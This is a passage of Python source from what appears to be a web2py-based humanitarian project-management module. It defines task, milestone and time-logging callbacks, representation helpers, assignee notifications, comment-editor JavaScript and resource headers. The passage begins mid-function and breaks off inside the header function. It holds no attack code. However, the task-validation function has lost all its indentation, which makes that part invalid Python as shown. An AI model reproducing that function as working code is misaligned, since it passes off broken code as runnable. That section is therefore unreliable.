    mtable = db.project_milestone
    ttable = db.project_task
    ltable = db.project_task_milestone
    query = (ttable.deleted == False) & \
            (ltable.task_id == ttable.id) & \
            (ltable.milestone_id == mtable.id)
    milestones = db(query).select(mtable.name)
    # Keyed by name rather than ID (matches original behaviour)
    return {row.name: row.name for row in milestones}
# -------------------------------------------------------------------------
@staticmethod
def project_assignee_represent(id, row=None):
    """
        FK representation of the Task assignee (pe_id)

        @param id: the pe_id (or a Row with pe_id & instance_type)
        @param row: the Row, if the record is already loaded
    """

    if row:
        id = row.pe_id
        instance_type = row.instance_type
    elif id:
        if isinstance(id, Row):
            instance_type = id.instance_type
            id = id.pe_id
        else:
            instance_type = None
    else:
        return current.messages["NONE"]

    db = current.db
    s3db = current.s3db
    if not instance_type:
        # Look up the instance type from the super-entity
        table = s3db.pr_pentity
        r = db(table._id == id).select(table.instance_type,
                                       limitby=(0, 1)).first()
        if r is None:
            # Stale/invalid pe_id (previously crashed with AttributeError)
            return current.messages.UNKNOWN_OPT
        instance_type = r.instance_type

    if instance_type == "pr_person":
        # initials?
        return s3_fullname(pe_id=id) or current.messages.UNKNOWN_OPT
    elif instance_type in ("pr_group", "org_organisation"):
        # Team or Organisation
        table = s3db[instance_type]
        r = db(table.pe_id == id).select(table.name,
                                         limitby=(0, 1)).first()
        try:
            return r.name
        except AttributeError:
            # Record not found (r is None)
            return current.messages.UNKNOWN_OPT
    else:
        return current.messages.UNKNOWN_OPT
# ---------------------------------------------------------------------
@staticmethod
def project_task_represent(id, row=None, show_link=True,
                           show_project=False):
    """
        FK representation of a Task

        @param id: the task ID
        @param row: the project_task Row, if already loaded
        @param show_link: render as a link to the task
        @param show_project: append the Project name in parentheses
    """

    if row:
        represent = row.name
        if show_project:
            db = current.db
            ltable = db.project_task_project
            ptable = db.project_project
            query = (ltable.task_id == row.id) & \
                    (ltable.project_id == ptable.id)
            project = db(query).select(ptable.name,
                                       limitby=(0, 1)).first()
            if project:
                represent = "%s (%s)" % (represent, project.name)

        if show_link:
            return A(represent,
                     _href=URL(c="project", f="task", extension="html",
                               args=[row.id]))
        return represent

    elif not id:
        return current.messages["NONE"]

    db = current.db
    table = db.project_task
    r = db(table.id == id).select(table.name,
                                  limitby=(0, 1)).first()
    try:
        represent = r.name
    except AttributeError:
        # Task not found (r is None) - was a bare except
        return current.messages.UNKNOWN_OPT
    else:
        if show_project:
            ltable = db.project_task_project
            ptable = db.project_project
            query = (ltable.task_id == id) & \
                    (ltable.project_id == ptable.id)
            project = db(query).select(ptable.name,
                                       limitby=(0, 1)).first()
            if project:
                represent = "%s (%s)" % (represent, project.name)

        if show_link:
            return A(represent,
                     _href=URL(c="project", f="task", extension="html",
                               args=[id]))
        return represent
# ---------------------------------------------------------------------
@staticmethod
def project_task_represent_w_project(id, row=None):
    """
        FK representation of a Task, prefixed with its Project name

        The show_project=True in the normal represent doesn't work as
        a lambda in IS_ONE_OF

        @param id: the task ID
        @param row: the project_task Row, if already loaded
    """

    if row:
        db = current.db
        ltable = db.project_task_project
        ptable = db.project_project
        query = (ltable.task_id == row.id) & \
                (ltable.project_id == ptable.id)
        project = db(query).select(ptable.name,
                                   limitby=(0, 1)).first()
        if project:
            represent = "%s: %s" % (project.name, row.name)
        else:
            # Fix: removed redundant double-assignment
            # (was "represent = represent = ...")
            represent = "- %s" % row.name
        return represent

    elif not id:
        return current.messages["NONE"]

    db = current.db
    table = db.project_task
    r = db(table.id == id).select(table.name,
                                  limitby=(0, 1)).first()
    try:
        name = r.name
    except AttributeError:
        # Task not found (r is None) - was a bare except
        return current.messages.UNKNOWN_OPT
    else:
        ltable = db.project_task_project
        ptable = db.project_project
        query = (ltable.task_id == id) & \
                (ltable.project_id == ptable.id)
        project = db(query).select(ptable.name,
                                   limitby=(0, 1)).first()
        if project:
            represent = "%s: %s" % (project.name, name)
        else:
            represent = "- %s" % name
        return represent
# -------------------------------------------------------------------------
@staticmethod
def project_task_realm_entity(table, record):
    """ Set the task realm entity to the project's realm entity """

    db = current.db
    ptable = db.project_project
    ltable = db.project_task_project
    query = (ltable.task_id == record.id) & \
            (ltable.project_id == ptable.id)
    project = db(query).select(ptable.realm_entity,
                               limitby=(0, 1)).first()
    # No linked project => no realm entity
    return project.realm_entity if project else None
# -------------------------------------------------------------------------
@staticmethod
def project_task_onvalidation(form):
""" Task form validation """
vars = form.vars
if str(vars.status) == "3" and not vars.pe_id:
form.errors.pe_id = \
current.T("Status 'assigned' requires the %(fieldname)s to not be blank") % \
dict(fieldname=current.db.project_task.pe_id.label)
elif vars.pe_id and str(vars.status) == "2":
# Set the Status to 'Assigned' if left at default 'New'
vars.status = 3
return
# -------------------------------------------------------------------------
@staticmethod
def project_task_create_onaccept(form):
    """
        When a Task is created:
            * Process the additional fields: Project/Activity/Milestone
            * create associated Link Table records
            * notify assignee
    """

    db = current.db
    s3db = current.s3db
    session = current.session

    id = form.vars.id

    if session.s3.event:
        # Create a link between this Task & the active Event
        etable = s3db.event_task
        etable.insert(event_id=session.s3.event,
                      task_id=id)

    ltp = db.project_task_project

    # The Project/Activity/Milestone links are posted in the request
    # vars, not as real fields of project_task
    vars = current.request.post_vars
    project_id = vars.get("project_id", None)
    if project_id:
        # Create Link to Project
        link_id = ltp.insert(task_id = id,
                             project_id = project_id)

    activity_id = vars.get("activity_id", None)
    if activity_id:
        # Create Link to Activity
        lta = db.project_task_activity
        link_id = lta.insert(task_id = id,
                             activity_id = activity_id)

    milestone_id = vars.get("milestone_id", None)
    if milestone_id:
        # Create Link to Milestone
        ltable = db.project_task_milestone
        link_id = ltable.insert(task_id = id,
                                milestone_id = milestone_id)

    # Make sure the task is also linked to the project
    # when created under an activity
    row = db(ltp.task_id == id).select(ltp.project_id,
                                       limitby=(0, 1)).first()
    if not row:
        # No direct project link yet: inherit it from the activity
        lta = db.project_task_activity
        ta = db.project_activity
        query = (lta.task_id == id) & \
                (lta.activity_id == ta.id)
        row = db(query).select(ta.project_id,
                               limitby=(0, 1)).first()
        if row and row.project_id:
            ltp.insert(task_id=id,
                       project_id=row.project_id)

    # Notify Assignee
    task_notify(form)
    return
# -------------------------------------------------------------------------
@staticmethod
def project_task_update_onaccept(form):
    """
        * Process the additional fields: Project/Activity/Milestone
        * Log changes as comments
        * If the task is assigned to someone then notify them

        @param form: the FORM; form.record holds the pre-update record
                     (None during record merges)
    """

    db = current.db
    s3db = current.s3db

    vars = form.vars
    id = vars.id
    record = form.record

    table = db.project_task

    changed = {}
    if record: # Not True for a record merger
        # Diff the submitted values against the previous record to
        # build a human-readable change log
        for var in vars:
            vvar = vars[var]
            rvar = record[var]
            if vvar != rvar:
                type = table[var].type
                if type == "integer" or \
                   type.startswith("reference"):
                    if vvar:
                        # Form values arrive as strings: normalize to int
                        # before comparing with the stored value
                        vvar = int(vvar)
                    if vvar == rvar:
                        continue
                represent = table[var].represent
                if not represent:
                    # Fall back to the raw value
                    represent = lambda o: o
                if rvar:
                    changed[var] = "%s changed from %s to %s" % \
                        (table[var].label, represent(rvar), represent(vvar))
                else:
                    changed[var] = "%s changed to %s" % \
                        (table[var].label, represent(vvar))
        if changed:
            # Store the change log as a task comment attributed to
            # the current user
            table = db.project_comment
            text = s3_auth_user_represent(current.auth.user.id)
            for var in changed:
                text = "%s\n%s" % (text, changed[var])
            table.insert(task_id=id,
                         body=text)

    # The Project/Activity/Milestone selectors are injected client-side,
    # so read them from request.post_vars
    vars = current.request.post_vars
    if "project_id" in vars:
        ltable = db.project_task_project
        filter = (ltable.task_id == id)
        project = vars.project_id
        if project:
            # Create the link to the Project
            #ptable = db.project_project
            #master = s3db.resource("project_task", id=id)
            #record = db(ptable.id == project).select(ptable.id,
            #                                         limitby=(0, 1)).first()
            #link = s3db.resource("project_task_project")
            #link_id = link.update_link(master, record)
            query = (ltable.task_id == id) & \
                    (ltable.project_id == project)
            record = db(query).select(ltable.id, limitby=(0, 1)).first()
            if record:
                link_id = record.id
            else:
                link_id = ltable.insert(task_id = id,
                                        project_id = project)
            # Exclude the current link from the cleanup below
            filter = filter & (ltable.id != link_id)
        # Remove any other links
        links = s3db.resource("project_task_project", filter=filter)
        ondelete = s3db.get_config("project_task_project", "ondelete")
        links.delete(ondelete=ondelete)

    if "activity_id" in vars:
        ltable = db.project_task_activity
        filter = (ltable.task_id == id)
        activity = vars.activity_id
        if vars.activity_id:
            # Create the link to the Activity
            #atable = db.project_activity
            #master = s3db.resource("project_task", id=id)
            #record = db(atable.id == activity).select(atable.id,
            #                                          limitby=(0, 1)).first()
            #link = s3db.resource("project_task_activity")
            #link_id = link.update_link(master, record)
            query = (ltable.task_id == id) & \
                    (ltable.activity_id == activity)
            record = db(query).select(ltable.id, limitby=(0, 1)).first()
            if record:
                link_id = record.id
            else:
                link_id = ltable.insert(task_id = id,
                                        activity_id = activity)
            # Exclude the current link from the cleanup below
            filter = filter & (ltable.id != link_id)
        # Remove any other links
        links = s3db.resource("project_task_activity", filter=filter)
        ondelete = s3db.get_config("project_task_activity", "ondelete")
        links.delete(ondelete=ondelete)

    if "milestone_id" in vars:
        ltable = db.project_task_milestone
        filter = (ltable.task_id == id)
        milestone = vars.milestone_id
        if milestone:
            # Create the link to the Milestone
            #mtable = db.project_milestone
            #master = s3db.resource("project_task", id=id)
            #record = db(mtable.id == milestone).select(mtable.id,
            #                                           limitby=(0, 1)).first()
            #link = s3db.resource("project_task_milestone")
            #link_id = link.update_link(master, record)
            query = (ltable.task_id == id) & \
                    (ltable.milestone_id == milestone)
            record = db(query).select(ltable.id, limitby=(0, 1)).first()
            if record:
                link_id = record.id
            else:
                link_id = ltable.insert(task_id = id,
                                        milestone_id = milestone)
            # Exclude the current link from the cleanup below
            filter = filter & (ltable.id != link_id)
        # Remove any other links
        links = s3db.resource("project_task_milestone", filter=filter)
        ondelete = s3db.get_config("project_task_milestone", "ondelete")
        links.delete(ondelete=ondelete)

    # Notify Assignee
    task_notify(form)
    return
# -------------------------------------------------------------------------
@staticmethod
def project_task_dispatch(r, **attr):
    """
        Send a Task Dispatch notice from a Task
        - if a location is supplied, this will be formatted as an OpenGeoSMS

        @param r: the S3Request
        @param attr: controller attributes (may contain an "rheader" callable)
        @raise HTTP: 501 for unsupported representations/methods
    """

    if r.representation == "html" and \
       r.name == "task" and r.id and not r.component:

        record = r.record
        text = "%s: %s" % (record.name,
                           record.description)

        # Encode the message as an OpenGeoSMS
        msg = current.msg
        message = msg.prepare_opengeosms(record.location_id,
                                         code="ST",
                                         map="google",
                                         text=text)

        # URL to redirect to after message sent
        url = URL(c="project",
                  f="task",
                  args=r.id)

        # Create the form
        if record.pe_id:
            # Pre-select the assignee as recipient
            opts = dict(recipient=record.pe_id)
        else:
            # No assignee: let the user pick a person
            opts = dict(recipient_type="pr_person")
        output = msg.compose(type="SMS",
                             message = message,
                             url = url,
                             **opts)

        # Maintain RHeader for consistency
        if "rheader" in attr:
            rheader = attr["rheader"](r)
            if rheader:
                output["rheader"] = rheader

        output["title"] = current.T("Send Task Notification")
        current.response.view = "msg/compose.html"
        return output

    else:
        raise HTTP(501, current.messages.BADMETHOD)
# -------------------------------------------------------------------------
@staticmethod
def project_milestone_duplicate(item):
    """
        Import item de-duplication: if a milestone with the same name
        (and, when supplied, the same project) already exists, flag the
        import item as an UPDATE of that record instead of a CREATE.

        @param item: the S3ImportItem
    """
    if item.tablename != "project_milestone":
        return
    data = item.data
    if not ("name" in data and data.name):
        # Nothing we can work with
        return
    table = item.table
    # Duplicate if same Name & Project (case-insensitive name match)
    query = (table.name.lower() == data.name.lower())
    if "project_id" in data and data.project_id:
        query &= (table.project_id == data.project_id)
    existing = current.db(query).select(table.id,
                                        limitby=(0, 1)).first()
    if existing:
        item.id = existing.id
        item.method = item.METHOD.UPDATE
    return
# -------------------------------------------------------------------------
@staticmethod
def project_time_onaccept(form):
    """
        When Time is logged, update the total time on the Task and,
        if the Task is linked to an Activity, on that Activity too.

        @param form: the FORM; form.vars.task_id is set on a direct form,
                     otherwise the task is looked up from the time entry
    """

    db = current.db
    titable = db.project_time
    ttable = db.project_task
    atable = db.project_activity
    tatable = db.project_task_activity

    # Find the Task
    task_id = form.vars.task_id
    if not task_id:
        # Component Form: look the task up from the time entry itself
        query = (titable.id == form.vars.id)
        record = db(query).select(titable.task_id,
                                  limitby=(0, 1)).first()
        if record:
            task_id = record.task_id
    if not task_id:
        # Defensive: no task could be resolved, so there is nothing to
        # update (previously the code continued with task_id=None and
        # issued pointless queries)
        return

    # Total the Hours Logged
    query = (titable.deleted == False) & \
            (titable.task_id == task_id)
    rows = db(query).select(titable.hours)
    hours = 0
    for row in rows:
        if row.hours:
            hours += row.hours

    # Update the Task
    query = (ttable.id == task_id)
    db(query).update(time_actual=hours)

    # Find the Activity
    query = (tatable.deleted == False) & \
            (tatable.task_id == task_id)
    activity = db(query).select(tatable.activity_id,
                                limitby=(0, 1)).first()
    if activity:
        activity_id = activity.activity_id

        # Find all Tasks in this Activity
        query = (ttable.deleted == False) & \
                (tatable.deleted == False) & \
                (tatable.task_id == ttable.id) & \
                (tatable.activity_id == activity_id)
        tasks = db(query).select(ttable.time_actual)

        # Total the Hours Logged across the whole Activity
        hours = 0
        for task in tasks:
            hours += task.time_actual or 0 # Handle None

        # Update the Activity
        query = (atable.id == activity_id)
        db(query).update(time_actual=hours)
    return
# -------------------------------------------------------------------------
@staticmethod
def project_time_effort_report(r, **attr):
    """
        Provide a Report on Effort by week
        - pivots logged hours with persons as rows and weeks as columns

        @param r: the S3Request
        @param attr: controller attributes (unused)
        @raise HTTP: 501 for non-HTML representations

        @ToDo: https://sahana.mybalsamiq.com/projects/sandbox/Effort
    """

    if r.representation != "html":
        raise HTTP(501, current.messages.BADMETHOD)

    # Deferred import - presumably avoids a circular import at module
    # load time (TODO confirm)
    from s3.s3data import S3PivotTable

    rows = "person_id"
    cols = "week"
    layers = [("hours", "sum")]
    pivot = S3PivotTable(r.resource, rows, cols, layers)

    output = {}
    output["items"] = pivot.html()
    output["title"] = current.T("Effort Report")
    current.response.view = "list.html"
    return output
# =============================================================================
class S3ProjectTaskHRMModel(S3Model):
    """
        Project Task HRM Model

        This class holds the tables used to link Tasks to Human Resources
        - either individuals or Job Roles
    """

    # Tables defined by this model (resolved lazily via s3db.*)
    names = ["project_task_job_title",
             "project_task_human_resource",
             ]

    def model(self):
        """ Define the link tables; return names to global scope (s3.*) """

        define_table = self.define_table
        task_id = self.project_task_id

        # ---------------------------------------------------------------------
        # Link Tasks <> Human Resources
        tablename = "project_task_human_resource"
        table = define_table(tablename,
                             task_id(),
                             self.hrm_human_resource_id(),
                             *s3_meta_fields())

        # ---------------------------------------------------------------------
        # Link Tasks <> Job Roles
        tablename = "project_task_job_title"
        table = define_table(tablename,
                             task_id(),
                             self.hrm_job_title_id(),
                             *s3_meta_fields())

        # ---------------------------------------------------------------------
        # Pass names back to global scope (s3.*)
        #
        return dict(
            )
# =============================================================================
class S3ProjectTaskIReportModel(S3Model):
    """
        Project Task IReport Model

        This class holds the table used to link Tasks with Incident Reports.

        @ToDo: Link to Incidents instead?
    """

    # Tables defined by this model (resolved lazily via s3db.*)
    names = ["project_task_ireport",
             ]

    def model(self):
        """ Define the link table; return names to global scope (s3.*) """

        # Link Tasks <-> Incident Reports
        #
        tablename = "project_task_ireport"
        table = self.define_table(tablename,
                                  self.project_task_id(),
                                  self.irs_ireport_id(),
                                  *s3_meta_fields())

        self.configure(tablename,
                       onaccept=self.task_ireport_onaccept)

        # ---------------------------------------------------------------------
        # Pass names back to global scope (s3.*)
        #
        return dict(
            )

    # -------------------------------------------------------------------------
    @staticmethod
    def task_ireport_onaccept(form):
        """
            When a Task is linked to an IReport, then populate the
            Task's location_id from the Incident Report
            - unless the Task already has a location
        """
        vars = form.vars
        ireport_id = vars.ireport_id
        task_id = vars.task_id

        db = current.db

        # Check if we already have a Location for the Task
        table = db.project_task
        query = (table.id == task_id)
        record = db(query).select(table.location_id,
                                  limitby=(0, 1)).first()
        if not record or record.location_id:
            # Task missing or already located: nothing to do
            return

        # Find the Incident Location
        itable = db.irs_ireport
        query = (itable.id == ireport_id)
        record = db(query).select(itable.location_id,
                                  limitby=(0, 1)).first()
        if not record or not record.location_id:
            # Incident has no location either
            return

        location_id = record.location_id

        # Update the Task
        query = (table.id == task_id)
        db(query).update(location_id=location_id)
        return
# =============================================================================
def multi_theme_percentage_represent(id):
    """
        Representation for Theme Percentages
        for multiple=True options

        @param id: a project_theme_percentage record id, or a list/tuple
                   of such ids
        @return: "Theme (NN%)" string, comma-separated for multiple ids;
                 NONE for an empty id, UNKNOWN_OPT for a stale id
    """

    if not id:
        return current.messages["NONE"]

    s3db = current.s3db
    table = s3db.project_theme_percentage
    ttable = s3db.project_theme

    def represent_row(row):
        # Joined Row: sub-Rows are keyed by tablename
        return "%s (%s%s)" % (row.project_theme.name,
                              row.project_theme_percentage.percentage,
                              "%")

    if isinstance(id, (list, tuple)):
        query = (table.id.belongs(id)) & \
                (ttable.id == table.theme_id)
        rows = current.db(query).select(table.percentage,
                                        ttable.name)
        # Renamed from "repr" (shadowed the builtin)
        return ", ".join(represent_row(row) for row in rows)
    else:
        query = (table.id == id) & \
                (ttable.id == table.theme_id)
        row = current.db(query).select(table.percentage,
                                       ttable.name).first()
        # Explicit None-check instead of the previous bare except:,
        # which silently swallowed all errors
        if row is None:
            return current.messages.UNKNOWN_OPT
        return represent_row(row)
# =============================================================================
class project_LocationRepresent(S3Represent):
    """ Representation of Project Locations """

    def __init__(self,
                 translate=False,
                 show_link=False,
                 multiple=False,
                 ):

        settings = current.deployment_settings
        if settings.get_project_community():
            # Community is the primary resource
            self.community = True
        else:
            # Location is just a way to display Projects on a map
            self.community = False
        if settings.get_gis_countries() == 1:
            # Single-country deployment: omit the country from the output
            self.multi_country = False
        else:
            self.multi_country = True
        self.use_codes = settings.get_project_codes()

        # Use the joined lookup below instead of the default single-table one
        self.lookup_rows = self.custom_lookup_rows

        super(project_LocationRepresent,
              self).__init__(lookup="project_location",
                             show_link=show_link,
                             translate=translate,
                             multiple=multiple)

    # -------------------------------------------------------------------------
    def custom_lookup_rows(self, key, values, fields=None):
        """
            Custom lookup method for organisation rows, does a
            join with the projects and locations. Parameters
            key and fields are not used, but are kept for API
            compatibility reasons.

            @param values: the project_location IDs
        """
        db = current.db
        ltable = current.s3db.project_location
        gtable = db.gis_location
        fields = [ltable.id,    # pkey is needed for the cache
                  gtable.name,
                  gtable.level,
                  gtable.L0,
                  gtable.L1,
                  gtable.L2,
                  gtable.L3,
                  gtable.L4,
                  gtable.L5,
                  ]

        if len(values) == 1:
            query = (ltable.id == values[0]) & \
                    (ltable.location_id == gtable.id)
            limitby = (0, 1)
        else:
            query = (ltable.id.belongs(values)) & \
                    (ltable.location_id == gtable.id)
            limitby = None

        if not self.community:
            # Also join the project so represent_row can prefix its name
            ptable = db.project_project
            query &= (ltable.project_id == ptable.id)
            fields.append(ptable.name)
            if self.use_codes:
                fields.append(ptable.code)

        rows = db(query).select(*fields,
                                limitby=limitby)
        self.queries += 1
        return rows

    # -------------------------------------------------------------------------
    def represent_row(self, row):
        """
            Represent a single Row

            @param row: the joined Row
        """
        community = self.community
        if not self.community:
            prow = row["project_project"]
        row = row["gis_location"]
        name = row.name
        level = row.level
        if level == "L0":
            location = name
        else:
            # Build the location path from the most specific level down
            # to the country, skipping the level that duplicates the
            # location's own name
            locations = [name]
            lappend = locations.append
            matched = False
            L5 = row.L5
            if L5:
                if L5 == name:
                    matched = True
                else:
                    lappend(L5)
            L4 = row.L4
            if L4:
                if L4 == name:
                    if matched:
                        # NOTE(review): once a higher level has matched,
                        # same-named lower levels are appended anyway -
                        # confirm this asymmetry is intended
                        lappend(L4)
                    matched = True
                else:
                    lappend(L4)
            L3 = row.L3
            if L3:
                if L3 == name:
                    if matched:
                        lappend(L3)
                    matched = True
                else:
                    lappend(L3)
            L2 = row.L2
            if L2:
                if L2 == name:
                    if matched:
                        lappend(L2)
                    matched = True
                else:
                    lappend(L2)
            L1 = row.L1
            if L1:
                if L1 == name:
                    if matched:
                        lappend(L1)
                    matched = True
                else:
                    lappend(L1)
            if self.multi_country:
                L0 = row.L0
                if L0:
                    if L0 == name:
                        if matched:
                            lappend(L0)
                        matched = True
                    else:
                        lappend(L0)
            location = ", ".join(locations)

        if community:
            return s3_unicode(location)
        else:
            if self.use_codes and prow.code:
                project =  "%s: %s" % (prow.code, prow.name)
            else:
                project = prow.name
            name = "%s (%s)" % (project, location)
            return s3_unicode(name)
# =============================================================================
def task_notify(form):
    """
        If the task is assigned to someone then notify them

        @param form: the create/update FORM for a project_task
    """

    vars = form.vars
    pe_id = vars.pe_id
    if not pe_id:
        # Unassigned task: nothing to notify
        return
    user = current.auth.user
    if user and user.pe_id == pe_id:
        # Don't notify the user when they assign themselves tasks
        return
    if int(vars.status) not in current.response.s3.project_task_active_statuses:
        # No need to notify about closed tasks
        return
    # form.record is None on create; on update, compare the (string)
    # submitted pe_id against the stored one
    if form.record is None or (int(pe_id) != form.record.pe_id):
        # Assignee has changed
        settings = current.deployment_settings

        if settings.has_module("msg"):
            # Notify assignee
            subject = "%s: Task assigned to you" % settings.get_system_name_short()
            url = "%s%s" % (settings.get_base_public_url(),
                            URL(c="project", f="task", args=vars.id))
            priority = current.s3db.project_task.priority.represent(int(vars.priority))
            message = "You have been assigned a Task:\n\n%s\n\n%s\n\n%s\n\n%s" % \
                (url,
                 "%s priority" % priority,
                 vars.name,
                 vars.description or "")
            current.msg.send_by_pe_id(pe_id, subject, message)
    return
# =============================================================================
class S3ProjectThemeVirtualFields:
    """ Virtual fields for the project table """

    def themes(self):
        """
            Themes associated with this Project
            - comma-separated list of "Name (NN%)" strings
        """
        try:
            project_id = self.project_project.id
        except AttributeError:
            # Not called from a project_project row
            return ""

        s3db = current.s3db
        # Kept although unused in the query: accessing the attribute may
        # lazily load the project model - TODO confirm
        ptable = s3db.project_project
        ttable = s3db.project_theme
        ltable = s3db.project_theme_percentage
        query = (ltable.deleted != True) & \
                (ltable.project_id == project_id) & \
                (ltable.theme_id == ttable.id)
        themes = current.db(query).select(ttable.name,
                                          ltable.percentage)

        if not themes:
            return current.messages["NONE"]

        parts = ["%s (%s%s)" % (theme.project_theme.name,
                                theme.project_theme_percentage.percentage,
                                "%")
                 for theme in themes]
        return ", ".join(parts)
# =============================================================================
# project_time virtual fields
#
def project_time_day(row):
    """
        Virtual field for project_time - abbreviated string format for
        date, allows grouping per day instead of the individual datetime,
        used for project time report.

        Requires "date" to be in the additional report_fields

        @param row: the Row
        @return: the date formatted as e.g. "05 March 13", or NONE
    """

    try:
        thisdate = row["project_time.date"]
    except AttributeError:
        return current.messages["NONE"]
    if not thisdate:
        return current.messages["NONE"]

    # Old-data filtering is assumed to happen in the controller, so no
    # date-range check here (removed dead code that computed the current
    # time and a one-week delta per row without using them)
    return thisdate.date().strftime("%d %B %y")
# =============================================================================
def project_time_week(row):
    """
        Virtual field for project_time - returns the date of the Monday
        (=first day of the week) of this entry, used for project time report.

        Requires "date" to be in the additional report_fields

        @param row: the Row
        @return: the Monday of the entry's week as a date, or NONE
    """

    try:
        thisdate = row["project_time.date"]
    except AttributeError:
        return current.messages["NONE"]
    if not thisdate:
        return current.messages["NONE"]

    # weekday() is 0 for Monday, so subtracting it lands on the Monday
    this_day = thisdate.date()
    return this_day - datetime.timedelta(days=this_day.weekday())
# =============================================================================
def project_ckeditor():
    """
        Load the Project Comments JS
        - appends the CKEditor scripts and the comment_reply() helper
          to the current response
    """

    s3 = current.response.s3

    ckeditor = URL(c="static", f="ckeditor", args="ckeditor.js")
    s3.scripts.append(ckeditor)
    adapter = URL(c="static", f="ckeditor", args=["adapters", "jquery.js"])
    s3.scripts.append(adapter)

    # Toolbar options: http://docs.cksource.com/CKEditor_3.x/Developers_Guide/Toolbar
    # @ToDo: Move to Static
    js = "".join((
'''i18n.reply="''', str(current.T("Reply")), '''"
var img_path=S3.Ap.concat('/static/img/jCollapsible/')
var ck_config={toolbar:[['Bold','Italic','-','NumberedList','BulletedList','-','Link','Unlink','-','Smiley','-','Source','Maximize']],toolbarCanCollapse:false,removePlugins:'elementspath'}
function comment_reply(id){
$('#project_comment_task_id__row').hide()
$('#project_comment_task_id__row1').hide()
$('#comment-title').html(i18n.reply)
$('#project_comment_body').ckeditorGet().destroy()
$('#project_comment_body').ckeditor(ck_config)
$('#comment-form').insertAfter($('#comment-'+id))
$('#project_comment_parent').val(id)
var task_id = $('#comment-'+id).attr('task_id')
$('#project_comment_task_id').val(task_id)
}'''))

    s3.js_global.append(js)
# =============================================================================
def project_rheader(r):
    """
        Project Resource Headers - used in Project & Budget modules

        @param r: the S3Request
        @return: the rheader DIV, or None for non-HTML representations
    """

    if r.representation != "html":
        # RHeaders only used in interactive views
        return None

    # Need to use this as otherwise demographic_data?viewing=project_location.x
    # doesn't have an rheader
    tablename, record = s3_rheader_resource(r)
    if not record:
        return None
    s3db = current.s3db
    table = s3db.table(tablename)

    resourcename = r.name

    T = current.T
    auth = current.auth
    settings = current.deployment_settings

    attachments_label = settings.get_ui_label_attachments()
    if resourcename == "project":
        mode_3w = settings.get_project_mode_3w()
        mode_task = settings.get_project_mode_task()

        # Tabs
        # - which tabs appear depends on the deployment settings
        ADMIN = current.session.s3.system_roles.ADMIN
        admin = auth.s3_has_role(ADMIN)
        #staff = auth.s3_has_role("STAFF")
        staff = True

        tabs = [(T("Basic Details"), None)]
        append = tabs.append
        if settings.get_project_multiple_organisations():
            append((T("Organizations"), "organisation"))
        if settings.get_project_theme_percentages():
            append((T("Themes"), "theme"))
        if mode_3w:
            if settings.get_project_community():
                append((T("Communities"), "location"))
            else:
                append((T("Locations"), "location"))
            append((T("Beneficiaries"), "beneficiary"))
        if settings.get_project_milestones():
            append((T("Milestones"), "milestone"))
        if settings.get_project_activities():
            append((T("Activities"), "activity"))
        if mode_task:
            append((T("Tasks"), "task"))
        if record.calendar:
            append((T("Calendar"), "timeline"))
        if settings.get_project_multiple_budgets():
            append((T("Annual Budgets"), "annual_budget"))
        if mode_3w:
            append((T("Documents"), "document"))
        else:
            append((attachments_label, "document"))
        if settings.get_hrm_show_staff():
            append((T("Staff"), "human_resource", dict(group="staff")))
        if settings.has_module("vol"):
            append((T("Volunteers"), "human_resource", dict(group="volunteer")))

        rheader_fields = [["code", "name"],
                          ["organisation_id"],
                          ["start_date", "end_date"]
                          ]
        rheader = S3ResourceHeader(rheader_fields, tabs)(r)

    elif resourcename in ["location", "demographic_data"]:
        tabs = [(T("Details"), None),
                (T("Beneficiaries"), "beneficiary"),
                (T("Demographics"), "demographic_data/"),
                (T("Contact People"), "contact"),
                ]
        rheader_fields = []
        if record.project_id is not None:
            rheader_fields.append(["project_id"])
        rheader_fields.append(["location_id"])
        # Pass record/table explicitly since this may be a "viewing" request
        rheader = S3ResourceHeader(rheader_fields, tabs)(r,
                                                         record = record,
                                                         table = table)

    elif resourcename == "framework":
        tabs = [(T("Details"), None),
                (T("Organizations"), "organisation"),
                (T("Documents"), "document")]
        rheader_fields = [["name"]]
        rheader = S3ResourceHeader(rheader_fields, tabs)(r)

    elif resourcename == "activity":
        tabs = [(T("Details"), None),
                (T("Contact People"), "contact")]
        if settings.get_project_mode_task():
            tabs.append((T("Tasks"), "task"))
            tabs.append((attachments_label, "document"))
        else:
            tabs.append((T("Documents"), "document"))
        rheader_fields = []
        if record.project_id is not None:
            rheader_fields.append(["project_id"])
        rheader_fields.append(["name"])
        rheader_fields.append(["location_id"])
        rheader = S3ResourceHeader(rheader_fields, tabs)(r)

    elif resourcename == "task":
        # Tabs
        tabs = [(T("Details"), None)]
        append = tabs.append
        append((attachments_label, "document"))
        if settings.has_module("msg"):
            append((T("Notify"), "dispatch"))
        #(T("Roles"), "job_title"),
        #(T("Assignments"), "human_resource"),
        #(T("Requests"), "req")

        rheader_tabs = s3_rheader_tabs(r, tabs)

        # RHeader
        # - look up the linked Project (via the link table)
        db = current.db
        ltable = s3db.project_task_project
        ptable = db.project_project
        query = (ltable.deleted == False) & \
                (ltable.task_id == r.id) & \
                (ltable.project_id == ptable.id)
        row = db(query).select(ptable.id,
                               ptable.code,
                               ptable.name,
                               limitby=(0, 1)).first()
        if row:
            project = s3db.project_project_represent(None, row)
            project = TR(TH("%s: " % T("Project")),
                         project,
                         )
        else:
            project = ""

        # Look up the linked Activity (via the link table)
        atable = s3db.project_activity
        ltable = s3db.project_task_activity
        query = (ltable.deleted == False) & \
                (ltable.task_id == r.id) & \
                (ltable.activity_id == atable.id)
        activity = db(query).select(atable.name,
                                    limitby=(0, 1)).first()
        if activity:
            activity = TR(TH("%s: " % T("Activity")),
                          activity.name
                          )
        else:
            activity = ""

        # Optional rows: each is only shown when the field has a value
        if record.description:
            description = TR(TH("%s: " % table.description.label),
                             record.description
                             )
        else:
            description = ""

        if record.site_id:
            facility = TR(TH("%s: " % table.site_id.label),
                          table.site_id.represent(record.site_id),
                          )
        else:
            facility = ""

        if record.location_id:
            location = TR(TH("%s: " % table.location_id.label),
                          table.location_id.represent(record.location_id),
                          )
        else:
            location = ""

        if record.created_by:
            creator = TR(TH("%s: " % T("Created By")),
                         s3_auth_user_represent(record.created_by),
                         )
        else:
            creator = ""

        if record.time_estimated:
            time_estimated = TR(TH("%s: " % table.time_estimated.label),
                                record.time_estimated
                                )
        else:
            time_estimated = ""

        if record.time_actual:
            time_actual = TR(TH("%s: " % table.time_actual.label),
                             record.time_actual
                             )
        else:
            time_actual = ""

        rheader = DIV(TABLE(project,
                            activity,
                            TR(TH("%s: " % table.name.label),
                               record.name,
                               ),
                            description,
                            facility,
                            location,
                            creator,
                            time_estimated,
                            time_actual,
                            #comments,
                            ), rheader_tabs)

